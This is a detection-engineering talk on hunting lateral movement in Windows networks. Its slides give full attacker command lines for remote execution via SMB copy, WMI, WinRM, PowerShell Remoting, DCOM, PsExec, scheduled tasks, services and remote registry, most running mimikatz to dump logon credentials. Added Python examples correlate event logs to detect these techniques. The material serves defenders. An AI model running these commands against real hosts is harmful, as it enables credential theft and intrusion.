Hunting Lateral Movement in Windows Infrastructure

Jan 22, 2018

Sergey Soldatov
Page 1: Hunting Lateral Movement in Windows Infrastructure

Hunting Lateral Movement in Windows Infrastructure

Teymur Kheirkhabarov

Page 2: Hunting Lateral Movement in Windows Infrastructure

Who Am I

• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex-infosec dept. head
• Ex-infosec admin
• Ex-system admin
• Twitter @HeirhabarovT
• www.linkedin.com/in/teymur-kheirkhabarov-73490867/

Page 3: Hunting Lateral Movement in Windows Infrastructure

What we’re going to talk about

• Different ways to launch executables remotely by using compromised credentials and operating system functionality;

• How to detect remotely launched executables with Windows Event and Sysmon logs.

Page 4: Hunting Lateral Movement in Windows Infrastructure

Remote file copy over SMB

How

• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service…
• Programmatically
• Using Explorer
• Using standard console tools:
  • robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe
  • powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public
  • cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"
  • xcopy mimikatz.exe "\\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Requirements & limitations

• TCP/445 port is accessible on remote host
• Administrative shares are enabled on remote host

Page 5: Hunting Lateral Movement in Windows Infrastructure

Remote File Copy over SMB – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Administrative share access (Windows EID 5140/5145)
E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
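The E1–E4 chain above is easiest to hunt when the events are joined on the logon session rather than inspected one at a time. The following Python is an added example (not code from the deck or its author): it correlates a network logon (4624, LogonType 3) with the 4672, 5140/5145 and 4663 events that carry the same SubjectLogonId inside a short window, and raises the severity when a write lands in the Startup folder. The events are constructed samples in a simplified dict form whose keys mirror the Windows event fields; the window length and the autostart path list are assumptions.

```python
"""Correlate destination-side events of a remote file copy over SMB:
4624 (network logon) -> 4672 -> 5140/5145 (admin share) -> 4663 (WriteData/AddFile).
All events below are constructed samples in a simplified dict form, not real logs."""
from datetime import datetime, timedelta

ADMIN_SHARES = {"ADMIN$", "C$", "D$", "IPC$"}
# Autostart folder whose modification should raise the severity (lower-cased substring).
AUTOSTART_HINTS = (r"\microsoft\windows\start menu\programs\startup",)
WRITE_MASK = 0x2  # WriteData (or AddFile) bit of the 4663 AccessMask
NETWORK_LOGON = 3


def share_name(value):
    # 5140/5145 report the share in UNC form (\\*\ADMIN$); keep only the last component.
    return value.rsplit("\\", 1)[-1].upper()


def hunt_smb_copies(events, window=timedelta(minutes=5)):
    """Return one finding per network logon session that touched an administrative share."""
    # E1: index network logons (4624, LogonType 3) by the LogonId they created.
    logons = {e["TargetLogonId"]: e
              for e in events if e["id"] == 4624 and e.get("LogonType") == NETWORK_LOGON}
    findings = {}
    for e in sorted(events, key=lambda x: x["ts"]):
        logon = logons.get(e.get("SubjectLogonId"))
        if logon is None or not (timedelta(0) <= e["ts"] - logon["ts"] <= window):
            continue
        f = findings.setdefault(logon["TargetLogonId"], {
            "logon_id": logon["TargetLogonId"], "source_ip": logon["IpAddress"],
            "user": logon["TargetUserName"], "privileged": False,
            "shares": set(), "targets": [], "files_written": [], "autostart": False})
        if e["id"] == 4672:                       # E2: admin privileges on the new logon
            f["privileged"] = True
        elif e["id"] in (5140, 5145):             # E3: administrative share access
            name = share_name(e["ShareName"])
            if name in ADMIN_SHARES:
                f["shares"].add(name)
                if e["id"] == 5145:
                    f["targets"].append(e["RelativeTargetName"])
        elif e["id"] == 4663 and int(e["AccessMask"], 16) & WRITE_MASK:  # E4: write access
            f["files_written"].append(e["ObjectName"])
            if any(h in e["ObjectName"].lower() for h in AUTOSTART_HINTS):
                f["autostart"] = True
    # Only sessions that actually reached an administrative share are reported.
    return [f for f in findings.values() if f["shares"]]


T0 = datetime(2018, 1, 22, 10, 0, 0)
SAMPLE_EVENTS = [  # constructed sample events
    # Benign: a network logon that only reads an ordinary file share.
    {"ts": T0, "id": 4624, "LogonType": 3, "TargetLogonId": "0x1a2b",
     "IpAddress": "10.0.0.7", "TargetUserName": "jdoe"},
    {"ts": T0 + timedelta(seconds=1), "id": 5145, "SubjectLogonId": "0x1a2b",
     "ShareName": r"\\*\Public", "RelativeTargetName": "report.docx"},
    # Suspicious: network logon, admin privileges, ADMIN$/C$ access, write into Startup.
    {"ts": T0 + timedelta(minutes=1), "id": 4624, "LogonType": 3, "TargetLogonId": "0x3c4d",
     "IpAddress": "10.0.0.5", "TargetUserName": "dadmin"},
    {"ts": T0 + timedelta(minutes=1, seconds=1), "id": 4672, "SubjectLogonId": "0x3c4d"},
    {"ts": T0 + timedelta(minutes=1, seconds=2), "id": 5145, "SubjectLogonId": "0x3c4d",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"users\public\payload.exe"},
    {"ts": T0 + timedelta(minutes=1, seconds=3), "id": 4663, "SubjectLogonId": "0x3c4d",
     "AccessMask": "0x2", "ObjectName": r"C:\Windows\users\public\payload.exe"},
    {"ts": T0 + timedelta(minutes=1, seconds=5), "id": 5145, "SubjectLogonId": "0x3c4d",
     "ShareName": r"\\*\C$",
     "RelativeTargetName": r"ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"},
    {"ts": T0 + timedelta(minutes=1, seconds=6), "id": 4663, "SubjectLogonId": "0x3c4d",
     "AccessMask": "0x2",
     "ObjectName": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"},
]

if __name__ == "__main__":
    for finding in hunt_smb_copies(SAMPLE_EVENTS):
        print(finding)
```

The 4663 leg only exists where object auditing and a SACL on the watched folders are configured, as the slide notes; without it the hunt still fires on 5145 to ADMIN$ or C$ but cannot tell a read from a write, so the RelativeTargetName list is what an analyst would then triage.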

Page 6: Hunting Lateral Movement in Windows Infrastructure

Remote File Copy over SMB – the most interesting events

Page 7: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for administrative shares connections

Page 8: Hunting Lateral Movement in Windows Infrastructure

Windows File Auditing

https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf

Page 9: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for file creation/changes in autostart locations

Page 10: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WMI

How

• Programmatically
• Using standard tools:
  • wmic /node:pc0002 process call create "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process -Name Create -ArgumentList '"cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"'
  • powershell -command "&{$process = [WMICLASS]'\\pc0002\ROOT\CIMV2:win32_process'; $process.Create('calc.exe'); }"
  • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = \"Win32_Process\"' -namespace 'root\cimv2' -computername pc0002; $process.Create( 'notepad.exe' );}"

Requirements & limitations

• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

Page 11: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WMI – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)

Page 12: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WMI – the most interesting events

Page 13: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WinRM

How

• Programmatically
• Using Windows Remote Shell (WinRS) tool:
  • winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
  • winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

Requirements & limitations

• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host

Page 14: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WinRM – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1)
E4. WinrsHost.exe starts payload file (Sysmon EID 1)

Page 15: Hunting Lateral Movement in Windows Infrastructure

Remote execution via WinRM – the most interesting events

Page 16: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Powershell Remoting

How

• Powershell scripts
• Powershell Invoke-Command cmdlet:
  • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }
  • powershell Invoke-Command -ComputerName pc0002.test.local -credential TEST\dadmin -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }

Requirements & limitations

• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host

Page 17: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Powershell Remoting – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1)
E4. wsmprovhost.exe starts payload file (Sysmon EID 1)

Page 18: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Powershell Remoting – the most interesting events

Page 19: Hunting Lateral Movement in Windows Infrastructure

Remote execution via MMC20.Application COM

How

• Programmatically
• Using powershell:

powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"

Requirements & limitations

• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Page 20: Hunting Lateral Movement in Windows Infrastructure

Remote execution via MMC20.Application COM – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts mmc.exe (Sysmon EID 1)
E4. mmc.exe starts payload file (Sysmon EID 1)

Page 21: Hunting Lateral Movement in Windows Infrastructure

Remote execution via MMC20.Application COM – the most interesting events

Page 22: Hunting Lateral Movement in Windows Infrastructure

Remote execution via PsExec (& clones, e.g. PaExec)

How

• PsExec:
  • psexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
• PaExec:
  • paexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

Requirements & limitations

• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host

Page 23: Hunting Lateral Movement in Windows Infrastructure

Remote execution via PsExec (& clones) – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145)
E4. psexesvc service is installed and started (Windows EID 7045/7036)
E5. psexesvc.exe is started by services.exe (Sysmon EID 1)
E6. psexesvc.exe starts payload file (Sysmon EID 1)
E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)

Page 24: Hunting Lateral Movement in Windows Infrastructure

Remote execution via PsExec (& clones) – the most interesting events

Page 25: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for PsExec (& clones) artifacts – services

Page 26: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for PsExec (& clones) artifacts – access to pipes

Page 27: Hunting Lateral Movement in Windows Infrastructure

Remote execution via PsExec (& clones) – the most interesting events

Page 28: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
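The hunt on this slide is the common denominator of the WMI, WinRM, Powershell Remoting, MMC20 and PsExec sequences: the payload is a child of a known host process and, more importantly, runs inside a logon session that was created by a type-3 (network) logon. The Python below is an added example, not code from the deck: it joins Sysmon EID 1 (LogonId, ParentImage, Image) with Security EID 4624 (TargetLogonId, LogonType) and labels each hit with the technique implied by the parent, as listed on the preceding slides. Events are constructed samples in a simplified dict form; the `source` key and the technique labels are assumptions.

```python
"""Find process creations inside network logon sessions by joining Sysmon EID 1
with Windows EID 4624. Events are constructed samples, not real logs."""
import os

NETWORK_LOGON = 3
# Destination-side host processes from the event sequences on the earlier slides.
REMOTE_EXEC_HOSTS = {
    "wmiprvse.exe": "WMI",
    "winrshost.exe": "WinRM (winrs)",
    "wsmprovhost.exe": "PowerShell Remoting",
    "mmc.exe": "MMC20.Application COM",
    "psexesvc.exe": "PsExec",
}


def basename(path):
    """Lower-cased file name of a Windows path (Sysmon logs full image paths)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def hunt_network_session_execs(events):
    """Return Sysmon process creations whose LogonId belongs to a type-3 logon."""
    # LogonId is a hex string in both logs; normalise case before joining.
    net_logons = {e["TargetLogonId"].lower(): e
                  for e in events
                  if e["source"] == "security" and e["id"] == 4624
                  and e.get("LogonType") == NETWORK_LOGON}
    findings = []
    for e in events:
        if e["source"] != "sysmon" or e["id"] != 1:
            continue
        logon = net_logons.get(e["LogonId"].lower())
        if logon is None:
            continue  # interactive or local session: outside this hunt (see note below)
        parent = basename(e["ParentImage"])
        findings.append({
            "image": e["Image"], "command_line": e["CommandLine"], "parent": parent,
            "source_ip": logon["IpAddress"], "user": logon["TargetUserName"],
            "technique": REMOTE_EXEC_HOSTS.get(parent, "unknown remote host process"),
        })
    return findings


SAMPLE_EVENTS = [  # constructed sample events
    {"source": "security", "id": 4624, "LogonType": 3, "TargetLogonId": "0x5e1f",
     "IpAddress": "10.0.0.5", "TargetUserName": "dadmin"},
    {"source": "security", "id": 4624, "LogonType": 2, "TargetLogonId": "0x9999",
     "IpAddress": "-", "TargetUserName": "jdoe"},
    # Payload under wsmprovhost.exe in the network session -> Powershell Remoting
    {"source": "sysmon", "id": 1, "LogonId": "0x5E1F",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": r"cmd /c C:\Users\Public\payload.exe >> C:\Users\Public\out.txt"},
    # Payload under WmiPrvSE.exe in the network session -> WMI
    {"source": "sysmon", "id": 1, "LogonId": "0x5e1f",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -enc AAAA"},
    # mmc.exe spawning a child in an interactive session: an admin using a console
    {"source": "sysmon", "id": 1, "LogonId": "0x9999",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe", "CommandLine": "notepad.exe"},
    # Ordinary desktop activity
    {"source": "sysmon", "id": 1, "LogonId": "0x9999",
     "Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "calc.exe"},
]

if __name__ == "__main__":
    for finding in hunt_network_session_execs(SAMPLE_EVENTS):
        print(finding["technique"], finding["command_line"])
```

Keying on the logon session rather than on the parent alone is what keeps mmc.exe or WmiPrvSE.exe children in interactive sessions out of the results. The join does not cover the ShellWindows/ShellBrowserWindow COM case on the later slides, where the payload is started by explorer.exe inside the currently logged-on user's interactive session, so its LogonId never maps to a type-3 logon.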

Page 29: Hunting Lateral Movement in Windows Infrastructure

Remote execution via ShellWindows COM

How

• Programmatically
• Using powershell:

powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"

Requirements & limitations

• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

Page 30: Hunting Lateral Movement in Windows Infrastructure

Remote execution via ShellBrowserWindow COM

How

• Programmatically
• Using powershell:

powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"

Requirements & limitations

• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Doesn’t work for Windows 7 destination

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

Page 31: Hunting Lateral Movement in Windows Infrastructure

Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. explorer.exe starts payload file in current session (Sysmon EID 1)

Page 32: Hunting Lateral Movement in Windows Infrastructure

Remote execution via ShellWindows or ShellBrowserWindow COM – how to detect???

Payload file is executed in the session of the current active user

Page 33: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Scheduled Tasks

How

• Programmatically
• Standard command line tools:
  • at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
  • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"

Requirements & limitations

• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT usage)

Page 34: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Scheduled Tasks – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Access to atsvc SMB pipe (Windows EID 5145) – in case of at.exe usage
E4. Scheduled task is created or updated (Windows EID 4698/4702)
E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1)
E6. taskeng.exe starts payload file (Sysmon EID 1)

There are also some interesting events in the Microsoft-Windows-TaskScheduler/Operational event log.

Page 35: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Scheduled Tasks – the most interesting events

Page 36: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for remotely created or updated scheduler tasks
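Event 4698 carries the whole task definition in its TaskContent field as XML, so the hunt on this slide can go beyond "who created a task" to "what the task runs". The Python below is an added example, not code from the deck: it parses the Exec action out of the TaskContent XML, marks the task as remotely created when the 4698/4702 SubjectLogonId belongs to a type-3 logon, and flags launcher-style actions of the kind the schtasks example on the earlier slide produces. The XML and events are constructed samples; the indicator list is an assumption. Real TaskContent starts with a UTF-16 XML declaration, which expat rejects on a str input, so the parser strips the declaration first.

```python
"""Parse Windows EID 4698/4702 TaskContent XML and mark remotely created tasks.
XML and events are constructed samples, not real logs."""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
NETWORK_LOGON = 3
# Indicators drawn from the schtasks example on the slides: a shell launcher, a
# world-writable staging folder and output redirection inside the action (assumption).
SUSPICIOUS_HINTS = ("cmd.exe", "powershell", "\\users\\public\\", ">>")


def parse_task_content(xml_text):
    """Return {command, arguments, working_dir} for every <Exec> action in the task."""
    # TaskContent is logged with an encoding="UTF-16" declaration; drop it so the
    # already-decoded str can be fed to ElementTree.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    actions = []
    for ex in root.iter(TASK_NS + "Exec"):
        actions.append({
            "command": (ex.findtext(TASK_NS + "Command") or "").strip(),
            "arguments": (ex.findtext(TASK_NS + "Arguments") or "").strip(),
            "working_dir": (ex.findtext(TASK_NS + "WorkingDirectory") or "").strip(),
        })
    return actions


def hunt_task_events(events):
    """One finding per 4698/4702; 'remote' means created from a network logon session."""
    net_logons = {e["TargetLogonId"] for e in events
                  if e["id"] == 4624 and e.get("LogonType") == NETWORK_LOGON}
    findings = []
    for e in events:
        if e["id"] not in (4698, 4702):
            continue
        actions = parse_task_content(e["TaskContent"])
        text = " ".join(a["command"] + " " + a["arguments"] for a in actions).lower()
        hits = [h for h in SUSPICIOUS_HINTS if h in text]
        remote = e["SubjectLogonId"] in net_logons
        findings.append({
            "task": e["TaskName"], "user": e["SubjectUserName"], "remote": remote,
            "actions": actions, "hits": hits, "suspicious": remote or bool(hits),
        })
    return findings


TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2018-01-22T00:57:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>cmd.exe</Command><Arguments>/c C:\Users\Public\payload.exe &gt;&gt; C:\Users\Public\result.txt</Arguments></Exec>
  </Actions>
</Task>"""

BENIGN_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>/silent</Arguments></Exec>
  </Actions>
</Task>"""

SAMPLE_EVENTS = [  # constructed sample events
    {"id": 4624, "LogonType": 3, "TargetLogonId": "0x4f4f", "IpAddress": "10.0.0.5"},
    {"id": 4624, "LogonType": 2, "TargetLogonId": "0x1111", "IpAddress": "-"},
    {"id": 4698, "SubjectUserName": "dadmin", "SubjectLogonId": "0x4f4f",
     "TaskName": r"\Adobe Update", "TaskContent": TASK_XML},
    {"id": 4698, "SubjectUserName": "jdoe", "SubjectLogonId": "0x1111",
     "TaskName": r"\Vendor Updater", "TaskContent": BENIGN_XML},
]

if __name__ == "__main__":
    for finding in hunt_task_events(SAMPLE_EVENTS):
        print(finding["task"], finding["remote"], finding["hits"])
```

The `remote` flag alone reproduces the slide's hunt (tasks created or updated from a network logon session); the content indicators are a second, independent signal that still works when the task was created locally by an already-compromised interactive session.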

Page 37: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Scheduled Tasks – the most interesting events

Page 38: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for ATSVC pipe connections

Page 39: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Services

How

• Programmatically
• Standard command line tool:
  • sc \\pc0002 create "Remote service" binPath= "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • sc \\pc0002 start "Remote service"
  • sc \\pc0002 delete "Remote service"

Requirements & limitations

• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host

Page 40: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Services – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. New service is installed (Windows EID 7045/4697)
E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1)
E5. A timeout is reached (Windows EID 7009)
E6. Failure while trying to start service (Windows EID 7000)

Page 41: Hunting Lateral Movement in Windows Infrastructure

Remote execution via Services – the most interesting events

Page 42: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for remotely created services
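The service sequence has a useful tell that the earlier slide spells out: a binPath that is really a command line (E4) never talks to the Service Control Manager, so the install (7045/4697) is followed within the SCM start timeout by 7009 and 7000 for the same service name. The Python below is an added example, not code from the deck: it scores each 7045 by whether the image path looks like a launcher, whether the name is a known PsExec/PaExec service, whether the matching 4697 came from a network logon session, and whether 7009/7000 followed shortly after. Events are constructed samples in a simplified dict form; the indicator strings and the time window are assumptions.

```python
"""Hunt for remotely created launcher services: 7045 + 4697, then 7009/7000.
Events are constructed samples, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON = 3
KNOWN_TOOL_SERVICES = {"psexesvc": "PsExec", "paexec": "PaExec"}
# binPath fragments that point to a command line rather than a service binary (assumption).
LAUNCHER_HINTS = ("cmd /c", "cmd.exe", "%comspec%", "powershell", ">>", "\\users\\public\\")


def hunt_service_installs(events, window=timedelta(minutes=2)):
    """Return one finding per 7045 that has at least one reason to look at it."""
    net_logons = {e["TargetLogonId"] for e in events
                  if e["id"] == 4624 and e.get("LogonType") == NETWORK_LOGON}
    # 7009 (timeout) / 7000 (start failure) follow-ups keyed by lower-cased service name.
    failures = defaultdict(list)
    for e in events:
        if e["id"] in (7009, 7000):
            failures[e["ServiceName"].lower()].append(e)
    # 4697 (Security log) is the event that carries the creating SubjectLogonId.
    remote_created = {e["ServiceName"].lower() for e in events
                      if e["id"] == 4697 and e["SubjectLogonId"] in net_logons}
    findings = []
    for e in events:
        if e["id"] != 7045:
            continue
        name, path = e["ServiceName"].lower(), e["ImagePath"].lower()
        reasons = []
        tool = next((t for k, t in KNOWN_TOOL_SERVICES.items() if k in name or k in path), None)
        if tool:
            reasons.append(f"known tool service ({tool})")
        if any(h in path for h in LAUNCHER_HINTS):
            reasons.append("binPath looks like a command launcher, not a service binary")
        if name in remote_created:
            reasons.append("created from a network logon session (4697)")
        if any(timedelta(0) <= f["ts"] - e["ts"] <= window for f in failures[name]):
            reasons.append("7009/7000 shortly after install: binary never reported to SCM")
        if reasons:
            findings.append({"service": e["ServiceName"], "image_path": e["ImagePath"],
                             "reasons": reasons})
    return findings


T0 = datetime(2018, 1, 22, 11, 0, 0)
SAMPLE_EVENTS = [  # constructed sample events
    {"ts": T0, "id": 4624, "LogonType": 3, "TargetLogonId": "0x7a7a", "IpAddress": "10.0.0.5"},
    {"ts": T0 + timedelta(seconds=2), "id": 4697, "SubjectLogonId": "0x7a7a",
     "ServiceName": "Remote service",
     "ServiceFileName": r"cmd /c C:\Users\Public\payload.exe >> C:\Users\Public\result.txt"},
    {"ts": T0 + timedelta(seconds=2), "id": 7045, "ServiceName": "Remote service",
     "ImagePath": r"cmd /c C:\Users\Public\payload.exe >> C:\Users\Public\result.txt"},
    {"ts": T0 + timedelta(seconds=33), "id": 7009, "ServiceName": "Remote service"},
    {"ts": T0 + timedelta(seconds=33), "id": 7000, "ServiceName": "Remote service"},
    {"ts": T0 + timedelta(minutes=5), "id": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": T0 + timedelta(minutes=9), "id": 7045, "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe"},
]

if __name__ == "__main__":
    for finding in hunt_service_installs(SAMPLE_EVENTS):
        print(finding["service"], finding["reasons"])
```

7045 lives in the System log and 4697 in the Security log (and 4697 needs the Security System Extension audit subcategory enabled), which is why the example keys both on the service name instead of expecting one event to carry everything.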

Page 43: Hunting Lateral Movement in Windows Infrastructure

Remote registry

How

• Programmatically
• Using powershell or reg:

• reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"

• powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(\"LocalMachine\", \"pc0002\"); $key=$reg.OpenSubKey(\"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",$True); $key.SetValue(\"GoogleUpdater\",\"calc.exe\");}"

Requirements & limitations

• TCP/445 port is accessible on remote host
• Remote Registry service is enabled on remote host

Page 44: Hunting Lateral Movement in Windows Infrastructure

Remote registry – events sequence on destination side

E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WINREG pipe access (Windows EID 5145)
E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured

Page 45: Hunting Lateral Movement in Windows Infrastructure

Remote Registry – the most interesting events

Page 46: Hunting Lateral Movement in Windows Infrastructure

Hunting: search for WINREG pipe connections
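Three of the hunts in this deck (pages 26, 38 and this one) are the same query over different named pipes: 5145 events on the IPC$ share whose RelativeTargetName is the PSEXESVC pipe and its -stdin/-stdout/-stderr companions, atsvc for at.exe, or winreg for the Remote Registry service. The Python below is an added example, not code from the deck, that classifies those pipe names and aggregates per source IP; svcctl is included as an assumption (the pipe behind remote sc.exe service control) and does not appear on the slides. Events are constructed samples in a simplified dict form.

```python
"""Classify 5145 (detailed file share) events on \\*\IPC$ by the named pipe touched
and aggregate per source IP. Events are constructed samples, not real logs."""
import re
from collections import Counter, defaultdict

PIPE_RULES = [  # (category, regex applied to RelativeTargetName)
    ("psexec", re.compile(r"^(psexesvc|paexec)", re.I)),          # PSEXESVC, PSEXESVC-host-pid-stdin, ...
    ("scheduled-task (atsvc)", re.compile(r"^atsvc$", re.I)),      # at.exe
    ("remote-registry (winreg)", re.compile(r"^winreg$", re.I)),  # reg.exe / OpenRemoteBaseKey
    ("service-control (svcctl)", re.compile(r"^svcctl$", re.I)),  # assumption: remote sc.exe
]


def classify_pipe(relative_target):
    """Category for a pipe name, or None when it is not one this hunt cares about."""
    for category, rx in PIPE_RULES:
        if rx.search(relative_target):
            return category
    return None


def hunt_ipc_pipes(events):
    """Per source IP: a Counter of pipe categories, the pipe names and the users seen."""
    per_source = defaultdict(lambda: {"categories": Counter(), "pipes": set(), "users": set()})
    for e in events:
        # 5145 reports the share in UNC form; only the IPC$ share carries named pipes.
        if e["id"] != 5145 or not e["ShareName"].upper().endswith("IPC$"):
            continue
        category = classify_pipe(e["RelativeTargetName"])
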